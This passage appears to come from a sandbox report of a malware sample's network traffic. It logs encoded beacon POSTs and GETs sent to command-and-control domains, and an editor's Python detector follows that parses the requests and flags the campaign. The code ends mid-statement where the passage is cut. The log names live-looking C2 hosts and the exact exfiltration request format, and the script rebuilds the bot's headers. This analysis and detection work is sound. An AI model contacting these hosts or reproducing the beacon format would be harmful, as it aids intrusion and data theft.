                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 48 5a 58 4e 52 63 4c 74 76 54 56 69 30 68 4c 50 70 46 71 53 6a 4f 48 65 72 71 71 6c 45 38 43 4a 6d 2b 69 65 79 33 34 59 6f 30 68 48 71 74 6f 50 49 6b 58 48 52 56 42 2b 63 42 30 48 63 63 50 54 67 57 43 38 45 35 36 53 64 72 6e 2b 67 49 2b 54 69 59 4b 78 76 30 71 70 62 58 4b 58 2b 72 45 78 30 74 58 71 4c 73 55 67 6a 4e 76 42 69 6e 4f 47 56 38 52 50 49 69 6e 62 37 33 75 6b 49 4e 6f 76 38 66 57 75 37 6a 75 67 4f 53 70 4f 36 4f 38 76 4d 68 46 49 36 57 51 49 56 78 48 63 56 4d 72 35 4e 37 6f 4e 5a 6d 74 65 73 71 6a 31 72 6f 4e 30 4c 76 52 6a 51 36 37 51 32 72 38 59 43 72 6a 5a 66 34 79 71 32 6f 6a 43 68 53 2b 53 71 4f 37 4f 5a 45 57 2f 65 31 59 30 79 35 33 30 41 66 33 66 65 57 6d 42 61 52 53 6e 42 58 56 33 53 6c 48 6f 74 4f 68 6f 6f 6c 36 78 61 38 72 67 31 4b 5a 59 69 56 41 73 34 50 71 2b 43 52 64 66 44 4b 74 65 70 42 67 75 45 45 57 79 62 4c 52 73 4d 62 74 30 76 52 42 6e 6e 76 64 52 39 65 39 45 6c 37 38 48 78 4e 31 39 7a 6f 4d 64 35 6c 4a 39 79 61 39 68 44 39 4f 6b 36 73 49 59 2b [TRUNCATED]
Data Ascii: N0spilI0= [TRUNCATED]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
24          192.168.2.4  49761        52.223.13.41    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:37:33.058896065 CEST  473                OUT        GET /2fpq/?Vvn=XtJLE6KXyHJ010P&N0spilI0=Kb/tSpzo2Dwy8QCik2PCr8/dlP2bBJ+jv+ep1kI5jCwuscQQek2bWkoiPh5FTvH+ji2zFJaVeezPpoGajJ7KnUaOWGTJ/qpny8WUA+svitDcwEORStRuN1w= HTTP/1.1
                                                      Host: www.insicilia.today
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Sep 25, 2024 05:37:33.539516926 CEST  404                IN         HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 25 Sep 2024 03:37:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 264
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 76 6e 3d 58 74 4a 4c 45 36 4b 58 79 48 4a 30 31 30 50 26 4e 30 73 70 69 6c 49 30 3d 4b 62 2f 74 53 70 7a 6f 32 44 77 79 38 51 43 69 6b 32 50 43 72 38 2f 64 6c 50 32 62 42 4a 2b 6a 76 2b 65 70 31 6b 49 35 6a 43 77 75 73 63 51 51 65 6b 32 62 57 6b 6f 69 50 68 35 46 54 76 48 2b 6a 69 32 7a 46 4a 61 56 65 65 7a 50 70 6f 47 61 6a 4a 37 4b 6e 55 61 4f 57 47 54 4a 2f 71 70 6e 79 38 57 55 41 2b 73 76 69 74 44 63 77 45 4f 52 53 74 52 75 4e 31 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Vvn=XtJLE6KXyHJ010P&N0spilI0=Kb/tSpzo2Dwy8QCik2PCr8/dlP2bBJ+jv+ep1kI5jCwuscQQek2bWkoiPh5FTvH+ji2zFJaVeezPpoGajJ7KnUaOWGTJ/qpny8WUA+svitDcwEORStRuN1w="}</script></head></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
25          192.168.2.4  49762        103.21.221.4    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:37:39.013556004 CEST  760                OUT        POST /abla/ HTTP/1.1
                                                      Host: www.tempatmudisini01.click
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.tempatmudisini01.click
                                                      Referer: http://www.tempatmudisini01.click/abla/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 63 2f 70 76 46 61 58 37 35 48 78 38 4c 69 53 65 4a 32 6c 59 6c 71 36 6e 71 4f 59 6b 73 36 4e 31 59 4a 67 73 54 74 4a 33 55 4c 30 69 51 4d 30 58 32 63 50 71 54 59 6a 70 71 46 51 56 69 72 48 77 54 61 67 75 4a 2f 2b 41 64 58 6a 44 38 6c 6d 47 41 6e 50 73 55 50 62 52 45 43 72 6b 50 64 76 44 75 52 30 75 78 64 6d 78 7a 66 56 43 78 52 5a 6b 35 53 36 70 52 4c 42 50 37 46 56 6f 5a 76 6e 64 4f 76 7a 55 65 51 51 37 63 56 6f 6f 73 57 39 39 37 63 5a 70 71 57 37 6f 69 73 63 68 76 61 48 2b 6d 48 64 58 73 44 44 49 61 4d 4f 6c 50 45 41 73 37 5a 64 65 6f 30 2b 78 30 36 62 6c 2f 62 35 74 77 51 3d 3d
                                                      Data Ascii: N0spilI0=c/pvFaX75Hx8LiSeJ2lYlq6nqOYks6N1YJgsTtJ3UL0iQM0X2cPqTYjpqFQVirHwTaguJ/+AdXjD8lmGAnPsUPbRECrkPdvDuR0uxdmxzfVCxRZk5S6pRLBP7FVoZvndOvzUeQQ7cVoosW997cZpqW7oischvaH+mHdXsDDIaMOlPEAs7Zdeo0+x06bl/b5twQ==


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
26          192.168.2.4  49763        103.21.221.4    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:37:41.563277006 CEST  780                OUT        POST /abla/ HTTP/1.1
                                                      Host: www.tempatmudisini01.click
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.tempatmudisini01.click
                                                      Referer: http://www.tempatmudisini01.click/abla/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 63 2f 70 76 46 61 58 37 35 48 78 38 4b 43 69 65 50 6c 4e 59 74 71 36 6b 6d 75 59 6b 6d 61 4e 78 59 4a 73 73 54 70 77 79 55 2b 45 69 51 75 38 58 33 65 6e 71 53 59 6a 70 6c 6c 51 55 2f 62 48 35 54 64 70 5a 4a 36 57 41 64 58 33 44 38 6b 57 47 41 30 6e 76 58 2f 62 58 63 79 72 6d 4c 64 76 44 75 52 30 75 78 65 61 62 7a 65 39 43 78 45 52 6b 37 7a 36 6d 53 4c 42 4d 34 46 56 6f 4f 66 6e 5a 4f 76 7a 6d 65 52 4d 52 63 57 51 6f 73 53 35 39 2f 64 5a 32 67 57 37 75 76 4d 63 32 6a 71 71 41 67 58 35 65 76 51 2f 61 52 73 32 7a 44 69 52 32 71 6f 38 4a 36 30 61 43 70 39 53 52 79 59 45 6b 72 58 44 77 45 52 76 72 74 59 36 61 42 78 35 72 76 4f 34 4e 63 6b 77 3d
                                                      Data Ascii: N0spilI0=c/pvFaX75Hx8KCiePlNYtq6kmuYkmaNxYJssTpwyU+EiQu8X3enqSYjpllQU/bH5TdpZJ6WAdX3D8kWGA0nvX/bXcyrmLdvDuR0uxeabze9CxERk7z6mSLBM4FVoOfnZOvzmeRMRcWQosS59/dZ2gW7uvMc2jqqAgX5evQ/aRs2zDiR2qo8J60aCp9SRyYEkrXDwERvrtY6aBx5rvO4Nckw=


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
27          192.168.2.4  49764        103.21.221.4    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:37:44.109908104 CEST  10862              OUT        POST /abla/ HTTP/1.1
                                                      Host: www.tempatmudisini01.click
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.tempatmudisini01.click
                                                      Referer: http://www.tempatmudisini01.click/abla/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 63 2f 70 76 46 61 58 37 35 48 78 38 4b 43 69 65 50 6c 4e 59 74 71 36 6b 6d 75 59 6b 6d 61 4e 78 59 4a 73 73 54 70 77 79 55 2f 51 69 51 37 77 58 78 35 37 71 56 59 6a 70 37 56 51 76 2f 62 47 72 54 63 4e 64 4a 36 61 51 64 56 50 44 7a 6d 65 47 51 56 6e 76 4d 76 62 58 56 53 72 6e 50 64 75 65 75 52 6b 71 78 64 79 62 7a 65 39 43 78 46 68 6b 38 69 36 6d 55 4c 42 50 37 46 56 61 5a 76 6e 39 4f 76 4c 32 65 52 4a 6d 63 6d 77 6f 74 79 70 39 39 4c 6c 32 39 47 37 73 71 4d 64 7a 6a 71 6d 6c 67 58 6b 6e 76 52 4c 30 52 76 71 7a 54 31 6f 54 32 38 49 77 75 31 54 59 31 4d 4f 4c 39 76 6b 6c 79 46 69 46 50 55 4b 79 2b 39 61 33 62 52 51 56 72 50 77 6d 59 67 79 4c 77 45 67 77 35 63 69 55 73 44 68 68 61 56 76 4d 44 62 42 38 41 77 59 68 59 53 6d 75 33 38 69 4d 74 6a 69 72 57 65 33 43 32 6b 4f 44 6a 58 61 4b 49 6e 63 57 52 55 35 6e 4d 38 61 2f 64 6f 52 39 7a 33 2b 64 63 38 4f 58 67 50 61 4b 54 6c 44 69 7a 30 6d 68 67 31 48 4f 4a 6f 41 30 4e 4e 76 4a 4e 62 65 34 71 41 48 34 41 7a 63 55 6c 49 69 58 66 [TRUNCATED]
Data Ascii: N0spilI0= [TRUNCATED]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
28          192.168.2.4  49765        103.21.221.4    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:37:46.656461954 CEST  480                OUT        GET /abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010P HTTP/1.1
                                                      Host: www.tempatmudisini01.click
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Sep 25, 2024 05:37:51.440862894 CEST  535                IN         HTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      x-powered-by: PHP/7.4.33
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      content-type: text/html; charset=UTF-8
                                                      x-redirect-by: WordPress
                                                      location: http://tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010P
                                                      x-litespeed-cache: miss
                                                      content-length: 0
                                                      date: Wed, 25 Sep 2024 03:37:51 GMT
                                                      server: LiteSpeed


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
29          192.168.2.4  49766        3.33.130.190    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:37:56.490895033 CEST  724                OUT        POST /xweg/ HTTP/1.1
                                                      Host: www.o731lh.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 205
                                                      Origin: http://www.o731lh.vip
                                                      Referer: http://www.o731lh.vip/xweg/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6c 53 6c 6d 61 65 32 57 37 49 64 2f 61 76 50 34 2b 64 6f 63 57 52 39 78 6d 7a 2b 6f 75 35 58 58 6e 36 4a 6a 4d 73 62 68 5a 41 45 46 4b 64 2f 34 74 2f 54 75 75 67 61 6c 64 77 31 5a 6a 71 4c 2f 54 67 71 4b 4b 51 4a 76 59 39 45 34 36 41 36 6c 67 55 38 37 75 48 50 44 77 38 2b 70 63 6f 68 49 43 69 78 54 32 61 50 52 76 41 53 47 47 54 6f 62 61 44 77 7a 4c 64 6f 78 57 64 64 5a 66 53 6e 37 78 30 2b 4b 59 33 44 47 33 53 2f 62 37 67 47 56 72 48 43 68 70 51 70 6e 73 36 49 6b 31 61 4b 52 75 67 5a 37 66 62 38 51 31 63 4a 7a 48 6f 41 54 30 37 38 35 65 41 3d 3d
                                                      Data Ascii: N0spilI0=+wuAD7MsHC5clSlmae2W7Id/avP4+docWR9xmz+ou5XXn6JjMsbhZAEFKd/4t/Tuugaldw1ZjqL/TgqKKQJvY9E46A6lgU87uHPDw8+pcohICixT2aPRvASGGTobaDwzLdoxWddZfSn7x0+KY3DG3S/b7gGVrHChpQpns6Ik1aKRugZ7fb8Q1cJzHoAT0785eA==


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
30          192.168.2.4  49767        3.33.130.190    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:37:59.095629930 CEST  744                OUT        POST /xweg/ HTTP/1.1
                                                      Host: www.o731lh.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 225
                                                      Origin: http://www.o731lh.vip
                                                      Referer: http://www.o731lh.vip/xweg/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6b 7a 56 6d 5a 39 75 57 73 34 64 34 47 2f 50 34 33 39 70 56 57 52 68 78 6d 79 72 74 75 4b 7a 58 6e 66 74 6a 4e 74 62 68 4a 51 45 46 54 74 2f 39 77 50 54 54 75 67 57 62 64 79 52 5a 6a 71 50 2f 54 6b 75 4b 4c 6e 39 73 5a 74 45 41 32 67 36 6e 39 45 38 37 75 48 50 44 77 38 71 50 63 72 52 49 44 53 68 54 77 2f 6a 57 6d 67 53 5a 57 44 6f 62 4d 7a 78 36 4c 64 6f 54 57 63 42 7a 66 52 66 37 78 77 36 4b 57 46 72 48 38 53 2f 52 6d 77 48 4e 71 55 37 54 6a 7a 49 57 71 37 6f 6b 30 71 53 46 69 47 49 68 4f 71 64 48 6e 63 74 41 61 76 4a 6e 35 34 42 77 46 4b 54 32 6b 4d 71 4a 43 71 37 6b 36 34 78 4d 6a 61 6f 66 44 50 73 3d
                                                      Data Ascii: N0spilI0=+wuAD7MsHC5ckzVmZ9uWs4d4G/P439pVWRhxmyrtuKzXnftjNtbhJQEFTt/9wPTTugWbdyRZjqP/TkuKLn9sZtEA2g6n9E87uHPDw8qPcrRIDShTw/jWmgSZWDobMzx6LdoTWcBzfRf7xw6KWFrH8S/RmwHNqU7TjzIWq7ok0qSFiGIhOqdHnctAavJn54BwFKT2kMqJCq7k64xMjaofDPs=


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
31          192.168.2.4  49768        3.33.130.190    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:38:01.643023968 CEST  10826              OUT        POST /xweg/ HTTP/1.1
                                                      Host: www.o731lh.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Length: 10305
                                                      Origin: http://www.o731lh.vip
                                                      Referer: http://www.o731lh.vip/xweg/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                      Data Raw: 4e 30 73 70 69 6c 49 30 3d 2b 77 75 41 44 37 4d 73 48 43 35 63 6b 7a 56 6d 5a 39 75 57 73 34 64 34 47 2f 50 34 33 39 70 56 57 52 68 78 6d 79 72 74 75 4b 37 58 6d 70 78 6a 50 4f 7a 68 4b 51 45 46 4d 64 2f 38 77 50 54 43 75 67 65 66 64 79 64 76 6a 73 54 2f 54 48 6d 4b 44 79 52 73 54 74 45 41 2b 41 36 6b 67 55 39 76 75 48 66 66 77 38 36 50 63 72 52 49 44 58 6c 54 77 71 50 57 71 41 53 47 47 54 70 4a 61 44 77 66 4c 64 77 70 57 63 46 4a 66 67 2f 37 77 51 71 4b 55 32 44 48 2f 79 2f 66 6e 77 48 65 71 56 48 49 6a 7a 6c 70 71 37 64 44 30 6f 4f 46 7a 78 46 46 52 65 56 37 37 39 64 45 46 73 56 36 35 6f 4a 33 4e 61 54 46 75 2b 57 63 61 35 54 54 32 49 49 37 78 71 49 75 65 76 44 45 43 61 6f 33 68 54 5a 30 70 64 59 33 73 44 78 4a 38 69 79 57 42 48 52 54 4a 42 77 39 66 6b 30 48 6b 45 2f 59 62 47 2f 2f 4c 30 2f 6f 43 32 53 41 4f 71 41 4c 35 71 73 6a 41 6a 50 38 71 4a 47 34 4d 75 44 49 72 4a 4b 62 56 43 38 35 58 72 37 34 76 51 58 6f 48 38 70 67 68 58 44 76 4a 64 44 64 48 32 58 72 4a 6d 70 4c 35 73 6f 63 30 2f 45 44 7a [TRUNCATED]
Data Ascii: N0spilI0= [TRUNCATED]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
32          192.168.2.4  49769        3.33.130.190    80                600  C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe
Timestamp                             Bytes transferred  Direction  Data
Sep 25, 2024 05:38:04.623636961 CEST  468                OUT        GET /xweg/?Vvn=XtJLE6KXyHJ010P&N0spilI0=zyGgAOIUWHAkjy5wbuax0/FfUf3h0NwJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8Y+Ai5wuik0xspH+a6MWSZLxuSkFH9/b6rws= HTTP/1.1
                                                      Host: www.o731lh.vip
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Sep 25, 2024 05:38:05.078841925 CEST  404                IN         HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 25 Sep 2024 03:38:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 264
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 76 6e 3d 58 74 4a 4c 45 36 4b 58 79 48 4a 30 31 30 50 26 4e 30 73 70 69 6c 49 30 3d 7a 79 47 67 41 4f 49 55 57 48 41 6b 6a 79 35 77 62 75 61 78 30 2f 46 66 55 66 33 68 30 4e 77 4a 61 78 5a 49 68 43 2b 4a 6c 4f 36 44 6e 62 5a 59 56 66 6e 33 57 6c 67 36 43 75 71 34 76 6f 6e 4b 2b 30 75 62 65 42 78 54 6e 73 44 4f 61 58 2b 62 42 54 6b 38 59 2b 41 69 35 77 75 69 6b 30 78 73 70 48 2b 61 36 4d 57 53 5a 4c 78 75 53 6b 46 48 39 2f 62 36 72 77 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Vvn=XtJLE6KXyHJ010P&N0spilI0=zyGgAOIUWHAkjy5wbuax0/FfUf3h0NwJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8Y+Ai5wuik0xspH+a6MWSZLxuSkFH9/b6rws="}</script></head></html>
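
Sessions 23 to 35 above record one check-in cycle per decoy domain: three POSTs whose only form field is N0spilI0=<base64> with Content-Length 205, 225 and 10305, then a GET carrying the same field together with Vvn=XtJLE6KXyHJ010P, every request with one fixed User-Agent and every POST with a Referer equal to its own target URL, sent in turn to hosts that answer like ordinary web servers (a WordPress 301 in session 28, an openresty page that redirects to /lander in sessions 24 and 32). The script below is an added example and not part of the Joe Sandbox report. It parses requests in the form shown, turns a "Data Raw" hex prefix back into the "Data Ascii" text, scores the per-request tells, and reports the campaign by the reuse of one opaque parameter name and User-Agent across unrelated hosts. The sample requests are reconstructed from sessions 25, 28 and 29 (the report's header set, bodies and query string copied from the Data Ascii fields, DATA_RAW_PREFIX being the first 21 bytes of session 25's Data Raw); build_request, suspicious_traits, flag_campaign and the other names are the editor's, and the Chrome 42 / Brotli check rests on Chrome having added br support only in version 49, which is general browser history rather than anything the report states.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36")
ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,"
          "image/avif,image/webp,*/*;q=0.8")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
DATA_RAW_PREFIX = "4e 30 73 70 69 6c 49 30 3d 63 2f 70 76 46 61 58 37 35 48 78 38"

def build_request(method, host, path, body=""):
    """Constructed sample with the header set the bot sent in the sessions above
    (Content-Length 205 is the report's value for sessions 25 and 29)."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}", f"Accept: {ACCEPT}",
             "Accept-Language: en-US"]
    if method == "POST":
        lines += ["Accept-Encoding: gzip, deflate, br",
                  "Content-Type: application/x-www-form-urlencoded",
                  "Cache-Control: no-cache", "Content-Length: 205",
                  f"Origin: http://{host}", f"Referer: http://{host}{path}"]
    lines += ["Connection: close", f"User-Agent: {UA}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body

SAMPLE_REQUESTS = [  # bodies and query copied verbatim from the Data Ascii fields
    build_request("POST", "www.tempatmudisini01.click", "/abla/",
                  "N0spilI0=c/pvFaX75Hx8LiSeJ2lYlq6nqOYks6N1YJgsTtJ3UL0iQM0X2cPqTYjpqFQVirHwTaguJ/+AdXjD8lmGAnPsUPbREC"
                  "rkPdvDuR0uxdmxzfVCxRZk5S6pRLBP7FVoZvndOvzUeQQ7cVoosW997cZpqW7oischvaH+mHdXsDDIaMOlPEAs7Zdeo0+x06bl/b5twQ=="),
    build_request("GET", "www.tempatmudisini01.click",
                  "/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8"
                  "HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010P"),
    build_request("POST", "www.o731lh.vip", "/xweg/",
                  "N0spilI0=+wuAD7MsHC5clSlmae2W7Id/avP4+docWR9xmz+ou5XXn6JjMsbhZAEFKd/4t/Tuugaldw1ZjqL/TgqKKQJvY9E46A6lgU8"
                  "7uHPDw8+pcohICixT2aPRvASGGTobaDwzLdoxWddZfSn7x0+KY3DG3S/b7gGVrHChpQpns6Ik1aKRugZ7fb8Q1cJzHoAT0785eA=="),
]

@dataclass
class HttpRequest:
    method: str
    path: str
    host: str
    headers: dict  # header names lower-cased
    body: str

def decode_data_raw(hex_dump):
    """Space-separated 'Data Raw' hex -> the report's 'Data Ascii' text."""
    return bytes.fromhex(hex_dump).decode("latin-1")

def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers.get("host", ""), headers, body)

def split_form_pairs(data):
    """Split on '&' and the FIRST '=' only. urllib.parse.parse_qs would map the
    raw '+' to a space and strip the '=' padding: the bot sends base64 unescaped."""
    pairs = {}
    for chunk in data.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs[key] = value
    return pairs

def beacon_params(req):
    return split_form_pairs(req.body if req.method == "POST" else req.path.partition("?")[2])

def suspicious_traits(req):
    """Per-request tells, each one visible in the request headers above."""
    h, traits = req.headers, []
    if any(BASE64_RE.match(v) and set(v) & set("+/=")
           for v in beacon_params(req).values()):
        traits.append("unescaped-base64-param")  # a browser would percent-encode + / =
    if "br" in h.get("accept-encoding", "") and "Chrome/42." in h.get("user-agent", ""):
        traits.append("brotli-before-chrome-49")  # Chrome added br in 49; 42 cannot
    if "origin" in h and h.get("referer") == h["origin"] + req.path:
        traits.append("self-referer")  # Referer is the POST target itself
    if req.method == "POST" and h.get("content-length") != str(len(req.body.encode())):
        traits.append("content-length-mismatch")
    return traits

def flag_campaign(reqs, min_hosts=2):
    """Group by (opaque parameter name, User-Agent): one key name reused with one
    fixed UA against unrelated hosts is the cross-host pattern the report shows."""
    groups = defaultdict(lambda: {"hosts": set(), "traits": set(), "sizes": set()})
    for req in reqs:
        traits = suspicious_traits(req)
        if "unescaped-base64-param" not in traits:
            continue
        for key, value in beacon_params(req).items():
            if BASE64_RE.match(value):
                g = groups[(key, req.headers.get("user-agent", ""))]
                g["hosts"].add(req.host)
                g["traits"].update(traits)
                if req.method == "POST":
                    g["sizes"].add(int(req.headers.get("content-length", "0")))
    return [{"param": key, "user_agent": ua, "hosts": sorted(g["hosts"]),
             "traits": sorted(g["traits"]), "post_sizes": sorted(g["sizes"])}
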